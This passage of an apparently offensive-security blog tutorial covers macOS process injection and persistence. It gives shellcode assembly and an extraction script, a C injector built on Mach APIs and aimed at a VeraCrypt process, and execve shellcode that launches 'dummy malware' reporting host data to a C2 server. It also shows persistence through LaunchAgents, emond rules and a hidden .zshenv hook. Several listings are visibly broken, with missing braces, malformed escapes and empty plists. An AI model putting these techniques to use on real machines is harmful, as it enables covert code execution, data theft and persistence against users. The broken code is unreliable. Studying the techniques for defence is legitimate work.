~ > ./nasm -f macho64 Hello.asm -o Hello.o && ld ./Hello.o -o Hello -lSystem -syslibroot `xcrun -sdk macosx --show-sdk-path`

~ > ./Hello
Hello World!

Pretty sophisticated, right? Now, to turn it into something we can use for injection, the machine code needs to be converted into a hexadecimal representation: a short series of bytes that is the exact sequence of instructions the processor will execute. For this we can just use objdump:

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'


But if you somehow can’t extract the shellcode with objdump alone, you can always script-kiddie a simple Python script that parses the disassembly output.

import re

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')
    for line in lines:
        # Keep only disassembly lines of the form "  address: bytes<TAB>mnemonic"
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1
    return shellcode, length

def main():
    objdump_output = ""  # paste the output of objdump -d here
    shellcode, length = extract_shellcode(objdump_output)
    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

But does the shellcode work? I hope so 🙂 To be sure, we should test it with a simple in-process run first. We can compile the shellcode into the executable’s __TEXT,__text section by declaring it as a global variable with a section attribute. A simple example:

const char output[] __attribute__((section("__TEXT,__text"))) =  "

typedef int (*funcPtr)();

int main(int argc, char **argv)
    funcPtr ret = (funcPtr) output;

    return 0;

Alright, now that we have the shellcode, it’s time to write the actual injector. Let’s start with the main function. I don’t know why, but it just feels like the natural starting point. The logic is simple: we take a single command-line argument, the process ID (PID) of the target process. Then we obtain a handle to our victim task using task_for_pid(). Next, we allocate a memory buffer in the remote task with mach_vm_allocate() and write our shellcode to it with mach_vm_write(). We then change the memory permissions of the remote buffer (mach_vm_protect(), or vm_protect() as in the listing below). After that, we create a remote thread whose context points to the start of the shellcode. thread_create_running() does this in one call, while the listing below uses thread_create(), thread_set_state() and thread_resume(). Finally, the thread runs our shellcode, which prints “Hello World”.

Remember our earlier discussion about the differences between a Mach thread and a BSD pthread, and about the task_for_pid() API call? To develop a utility that uses task_for_pid(), you’ll need to create an Info.plist file. This file is embedded into your executable and covered by its code signature, with the key set to “allow”. Below is an example of the Info.plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

Note: not all sections of a program’s virtual memory permit their contents to be interpreted as code by the CPU (i.e., “marked executable”). Memory can be marked as readable (R), writable (W), executable (E), or some combination of the three. For instance, a page marked RW means one can read/write to these addresses in memory, but their contents may not be treated as executable by the CPU. This is a crucial aspect of memory protection and security in modern operating systems.

Executable memory regions are typically marked with the execute (E) permission, allowing the CPU to interpret the contents of these regions as machine instructions and execute them. This is essential for running programs, as the CPU needs to fetch instructions from memory and execute them.

However, allowing arbitrary memory regions to be executable can pose significant security risks, such as buffer overflow attacks or injection of malicious code. Therefore, modern operating systems employ memory protection mechanisms to restrict the execution of code to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can enforce security policies and prevent unauthorized execution of code. For example, writable memory regions that contain data should not be executable to prevent the execution of injected malicious code. Conversely, executable code should not be writable to prevent tampering with the program’s instructions.
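To make the R/W/E combinations concrete, here is a small sketch that decodes a protection value and flags the "writable and executable at once" case the paragraphs above warn about. The three bit values match Mach's VM_PROT_READ, VM_PROT_WRITE and VM_PROT_EXECUTE; the helper names `describe` and `violates_wx` are made up for illustration.

```python
VM_PROT_READ = 0x1
VM_PROT_WRITE = 0x2
VM_PROT_EXECUTE = 0x4


def describe(prot):
    """Render a protection value as an 'rwx'-style string."""
    flags = (("r", VM_PROT_READ), ("w", VM_PROT_WRITE), ("x", VM_PROT_EXECUTE))
    return "".join(ch if prot & bit else "-" for ch, bit in flags)


def violates_wx(prot):
    """True when a page would be writable and executable at the same time."""
    return bool(prot & VM_PROT_WRITE) and bool(prot & VM_PROT_EXECUTE)


if __name__ == "__main__":
    for prot in (VM_PROT_READ | VM_PROT_WRITE, VM_PROT_READ | VM_PROT_EXECUTE, 0x7):
        print(describe(prot), violates_wx(prot))
```

A data page is typically `rw-`, a code page `r-x`, and a page that is `rwx` is the combination a write-xor-execute policy rejects.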

Alright, at the entry point we convert the PID, provided as a string, to an integer and call the inject_shellcode function to inject the shellcode into the target process with that PID.

We need to interact with the target process, so we declare a few variables to hold essential information. These include remote_task to represent the task port of the target process, remote_stack to store the address of the allocated memory for the remote stack within the target process, and shellcode_region to keep track of the memory region allocated for the shellcode.

Now, the process begins. We need to get permission to access the target process, so we use the task_for_pid function to obtain the task port. This allows us to manipulate the memory and threads of the target process.

With access granted, we proceed to allocate memory within the target process. We reserve space for both the remote stack and the shellcode using mach_vm_allocate. This ensures that we have a place to execute our code.

Once memory is allocated, we write our shellcode into the allocated memory space of the target process using mach_vm_write. This effectively places our code where it needs to be executed.

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;
    mach_vm_address_t remote_stack = 0;
    vm_region_t shellcode_region;
    mach_error_t kr;

    // Get the task port for the target process
    kr = task_for_pid(mach_task_self(), pid, &remote_task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to get the task port for the target process: %sn", mach_error_string(kr));
        return -1;

    // Allocate memory for the stack in the target process
    kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote stack: %sn", mach_error_string(kr));
        return -1;

    // Allocate memory for the shellcode in the target process
    kr = mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote code: %sn", mach_error_string(kr));
        return -1;
    shellcode_region.size = shellcode_size;
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory in the target process
    kr = mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to write shellcode to remote process: %sn", mach_error_string(kr));
        return -1;

    // Adjust memory permissions for the shellcode
    kr = vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set memory permissions for remote code: %sn", mach_error_string(kr));
        return -1;

    // Create a remote thread to execute the shellcode
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));
    thread_state.__rip = (uint64_t)shellcode_region.addr;
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);

    thread_act_t remote_thread;
    kr = thread_create(remote_task, &remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to create remote thread: %sn", mach_error_string(kr));
        return -1;

    // Set the thread state
    kr = thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set thread state: %sn", mach_error_string(kr));
        return -1;

    // Resume the remote thread
    kr = thread_resume(remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to resume remote thread: %sn", mach_error_string(kr));
        return -1;

    printf("Shellcode injected successfully!n");

    mach_port_deallocate(mach_task_self(), remote_thread);

    return 0;

To ensure that our shellcode can run, we modify the memory permissions of the allocated memory region containing the shellcode. We use vm_protect to set the appropriate permissions, allowing for execution. Now, it’s time to execute our shellcode. We create a remote thread within the target process using thread_create. This thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the thread to execute our shellcode by setting the instruction pointer (rip) to the starting address of the shellcode and the stack pointer (rsp) to the allocated remote stack. Finally, we’re ready to execute our shellcode. We resume the remote thread using thread_resume, allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating that the shellcode was injected successfully. We also clean up any resources used during the injection process by deallocating Mach ports. And that’s it! The entire process of injecting shellcode into a target process on macOS using Mach APIs.

In our injector, we’re injecting shellcode into a target process using Mach APIs in macOS. Now, one significant difference between POSIX threads and Mach threads comes into play here.
POSIX threads utilize the thread local storage (TLS) data structure, which is crucial for managing thread-specific data. However, Mach threads don’t have this concept of TLS.

Now, when we inject our shellcode into the target process and create a remote thread to execute it, we can’t simply point the instruction pointer in the thread context struct and expect everything to work smoothly. Why? Because our shellcode, which is essentially unmanaged code, needs to run in a controlled environment, and transitioning from a Mach thread directly to executing our shellcode might cause issues.

So, to prevent potential crashes or errors, we need to ensure that our shellcode is executed within the context of a fully-fledged POSIX thread. This means that as part of our injection process, we have to somehow promote our shellcode from being executed within the context of a base Mach thread to being executed within the context of a POSIX thread. By doing this, we create a more stable environment for our shellcode to execute, ensuring that when the target process resumes its execution at the start of our shellcode, it does so without any issues. This promotion process is essential for the successful execution of our injected shellcode in user mode without causing crashes or unexpected behavior.
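If thread-local storage is unfamiliar, the idea is simply that each thread gets its own private copy of a variable. The sketch below shows the concept with Python's `threading.local`. It is only an analogy for what the pthread layer sets up for every properly created thread, and it says nothing about how Mach or libpthread implement it.

```python
import threading

tls = threading.local()  # each thread sees its own attributes on this object
results = {}


def worker(name):
    tls.value = name           # stored in this thread's private slot
    results[name] = tls.value  # read back: always this thread's own value


if __name__ == "__main__":
    threads = [threading.Thread(target=worker, args=(n,)) for n in ("a", "b")]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(results)
    print(hasattr(tls, "value"))  # the main thread never set a value
```

Library code that expects such per-thread state to exist is what goes wrong on a bare thread where nobody initialized it.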

As you can see, we injected our shellcode into the Veracrypt process successfully. The message “Hello World!” was printed, confirming that the shellcode executed as expected and produced the desired output.

Now, let’s shift our focus. Remember the code we previously developed to transmit system data to the C2 server? What if we inject shellcode into the Veracrypt process to execute our dummy malware, enabling it to establish communication with the C2 server and transmit host data? To execute a shell command, considering I’m running zsh, we need to trigger a syscall that runs /bin/zsh -c, which means using execve. What does this do? Simply put, it executes the program referenced by pathname, and the shell in turn runs the command we hand it, which in our case is the dummy malware path.

Alright, again we need to write a simple assembly code to execute /bin/zsh -c '/Users/foo/dummy', first we begin by setting up a register (rbx) and loading the string '/bin/zsh' into it. Once this string is pushed onto the stack, we proceed to load the ASCII values for -c into the lower 16 bits of the rax register. After pushing this -c flag onto the stack, we set the rbx register to point to the -c flag on the stack, as it will be necessary later during the syscall preparation.

Any additional details will be described in comments within the code. At the end of this section, there’s an indirect jump facilitating the execution of subsequent instructions. This jump redirects the program flow to the address stored in the exec subroutine, ensuring the continuity of execution.
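The constant 0x632D used for -c follows from x86 byte order: a value pushed onto the stack is stored least significant byte first, so the character that should come first in memory has to sit in the lowest byte of the register. A quick sketch of that arithmetic, with a made-up helper name `as_le_immediate`:

```python
def as_le_immediate(text):
    """Return the integer whose little-endian bytes spell out `text`."""
    data = text.encode("ascii")
    if len(data) > 8:
        raise ValueError("does not fit in a 64-bit register")
    return int.from_bytes(data, "little")


if __name__ == "__main__":
    print(hex(as_le_immediate("-c")))
```

Here '-' is 0x2D and 'c' is 0x63, so the value is 0x632D. The same reasoning explains why an eight-character string fits exactly into one 64-bit register.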

global _main

    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set bit 25 of rax (0x2000000, the Unix syscall class)
    syscall             ; Invoke syscall

    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright, time to try this beauty. As usual, we need to extract the shellcode and test it before using it. As you can see below, we’ve successfully injected our shellcode, triggering our dummy malware, and we’re now receiving host information on the C2 server. We could push this further by exploring additional capabilities and attack vectors, but I think that’s enough for now. 🙂

The “Dummy” just executes and sends host information, so it does nothing to harm your computer. It’s more about showing how malware can be triggered and how it uses injection techniques to spread. Injection is also interesting for defense evasion or for adding backdoor capabilities. This was just a quick look at the Mach API, covering system calls and code injection techniques, and there’s a lot more to explore beyond what we’ve touched on here. All the code used here can be found on GitHub.

Alright, let’s discuss persistence. It’s a crucial step once we’ve gained initial access and understood the situation. Typically, we aim to establish some form of persistence. We don’t want to rely solely on that initial access point because it could be terminated for various reasons. There might be issues with the user’s computer, or the target could decide to shut everything down. So, it’s important to have a method in place to maintain access to the target.

While there are several persistence techniques for macOS systems, many of them require root privileges, or exploit some sort of low-level vulnerability to escalate. To keep things simple, let’s focus on userland persistence. First, I’ll describe some well-known persistence techniques and some lesser-known ones, so you can understand how these techniques work and how malware can use them. Alright, let’s go:

Before I began writing this article, I analyzed some samples targeting macOS. One commonality among them is that launch agents and launch daemons are by far the most prevalent methods of persistence. Why, you might ask? Well, it’s because of their simplicity and flexibility. You could liken them to the startup folder persistence equivalent on Windows. However, detecting such techniques is relatively easy. Remember when we mentioned LOLBins? Well, think of it as a similarly straightforward and common method, and the detection methods are also well-known.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are key components of macOS, responsible for managing processes automatically. LaunchAgents are typically located in the ~/Library/LaunchAgents directory for user-specific tasks, triggering actions when a user logs in. On the flip side, LaunchDaemons are situated in /Library/LaunchDaemons, initiating tasks upon system startup.

Although LaunchAgents primarily operate within user sessions, they can also be found in system directories like /System/Library/LaunchAgents. However, modifying these files would require disabling System Integrity Protection (SIP), which is not recommended due to potential security risks. In contrast, LaunchDaemons, operating at a system level, require administrator privileges for installation and typically reside in /Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist files, specifying commands or referencing executable files for execution.
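Because these job definitions are ordinary property lists, they are easy to inspect, which is also why this kind of persistence is easy to spot. A minimal sketch of reading one with Python's standard `plistlib` follows. The sample plist, its `com.example.agent` label and the `summarize_job` helper are made up for illustration; `Label`, `Program`, `ProgramArguments` and `RunAtLoad` are standard launchd keys.

```python
import plistlib

# Hypothetical, harmless job definition used only as sample input.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.agent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/true</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
"""


def summarize_job(plist_bytes):
    """Extract what a launchd job will run and whether it starts at load."""
    job = plistlib.loads(plist_bytes)
    return {
        "label": job.get("Label"),
        "command": job.get("ProgramArguments") or [job.get("Program")],
        "run_at_load": bool(job.get("RunAtLoad", False)),
    }


if __name__ == "__main__":
    print(summarize_job(SAMPLE))
```

Running a summary like this over every file in the LaunchAgents and LaunchDaemons directories gives a quick overview of what starts automatically on a machine.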

LaunchAgents are suitable for tasks requiring user interaction, while LaunchDaemons are better suited for background processes. Let’s take a LaunchAgents example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

So, what does this all mean? Basically, when we want our binary to run every time a user logs onto the system, we just tell launchd to handle it. It’s pretty straightforward, right? But here’s where it gets interesting: there’s something called emond, a command native to macOS located at /sbin/emond. This little tool is quite handy; it accepts events from various services, processes them through a simple rules engine, and takes action accordingly. These actions can involve running commands or performing other tasks.

Now, emond isn’t just any ordinary command. It functions as a regular daemon and is kicked off by launchd every time the operating system starts up. Its configuration file, where we set when and how emond runs, hangs out with the other system daemons at /System/Library/LaunchDaemons/

But how can we use this event monitoring daemon to establish persistence? Well, the mechanics of emond are pretty much like any other LaunchDaemon. It’s launchd’s job to fire up all the LaunchDaemons and LaunchAgents during the boot process. Since emond starts up during boot, if you’re using the _run command_ action, you need to be mindful of what command you’re executing and when during the boot process it’ll happen.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

So, in our SampleRules.plist file, we have a setup called ‘foo’. First off, it waits for 10 seconds after startup. This is done using a command called sleep. Next, we use curl to simply send a DNS query record to verify that it’s actually working, and once the service has started, your event will immediately fire and trigger any actions. emond isn’t a new way to monitor events on macOS, but it’s considered innovative when used for offensive purposes.

Bash Profiles & Zsh Startup

Let’s talk about those bash profiles on Linux systems. They’re essentially scripts containing commands that run whenever you open up a terminal. Now, with macOS Catalina, they’ve switched from using Bash to Z shell as the default. But don’t fret, because you can still achieve the same thing with Z shell.

Instead of bash profiles, Z shell has its own version called startup files, which serve the same purpose. But here’s the twist: Z shell also comes with an extra file called the Z shell environment file. This file is more powerful because it kicks in more often, ensuring persistence across different interactions with Z shell.

The cool thing is that even if you just type in a command like zsh -c, this Z shell environment file still gets sourced. This means your persistence setup remains strong, no matter how you’re using Z shell.
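Which files zsh reads depends on whether the shell is a login shell and whether it is interactive. The sketch below encodes the per-user order from the zsh documentation, leaving out the system-wide files under /etc and the ZDOTDIR override. The function name `zsh_startup_files` is made up for illustration.

```python
def zsh_startup_files(login, interactive):
    """Per-user startup files zsh sources, in order, for a given shell type."""
    files = [".zshenv"]           # read by every zsh invocation
    if login:
        files.append(".zprofile")
    if interactive:
        files.append(".zshrc")
    if login:
        files.append(".zlogin")
    return files


if __name__ == "__main__":
    print(zsh_startup_files(login=False, interactive=False))  # e.g. zsh -c '...'
    print(zsh_startup_files(login=True, interactive=True))    # a login terminal
```

A `zsh -c` invocation is neither a login shell nor interactive, so `.zshenv` is the only per-user file it reads. That also makes `.zshenv` the first file worth checking when reviewing a machine.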


~ > cat .zshenv
. "/Users/foo/" > /dev/null 2>&1&

Now, every time you open a terminal and Z shell initializes, it will automatically execute the script, ensuring that your desired commands or actions are performed consistently.

Now, to execute it in the background, we use setopt NO_MONITOR. This command disables job monitoring and then runs the script in the background. As a result, the script runs every time you open a terminal with Z shell, but it runs silently in the background.

So, you get the gist of it, right? These are some of the known techniques I’ve come across, especially in samples. There are more, like cron jobs, Dock shortcuts, and so on.

This was just a basic overview of how easy it is to stick around on a machine. As I mentioned earlier, spotting these tricks isn’t exactly tough, but they can still be a problem. A skilled attacker can get past most security setups with just a simple MSFVenom shellcode. Usually, at this point in the article, I’d start talking about writing a simple malware. But since we’ve already covered code injection pretty extensively, adding more code might just make things drag on and get confusing. So, let’s skip the whole malware-making part for now. We can save that for another article where we can really dive into the whole process. Maybe we’ll even throw in a macOS rootkit and some other fancy stuff.

In conclusion, I hope you’ve enjoyed this and learned something from it. We’ve covered a broad array of topics related to the OS X architecture and API, though we’ve only scratched the surface. By delving into techniques and writing simple code using the Mach API, we’ve gained a deeper understanding of the environment, its features, and its security. We’ve covered fundamental concepts like code injection and simple persistence techniques, and we’ve even seen macOS syscalls in action through examples. Until next time.

Source: Original Post
